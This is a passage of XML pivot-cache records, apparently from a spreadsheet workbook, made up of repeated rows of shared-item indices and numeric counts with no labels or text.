    <x v="1507"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="33"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="35"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="125"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="148"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="7"/>
    <x v="1526"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="46"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1528"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
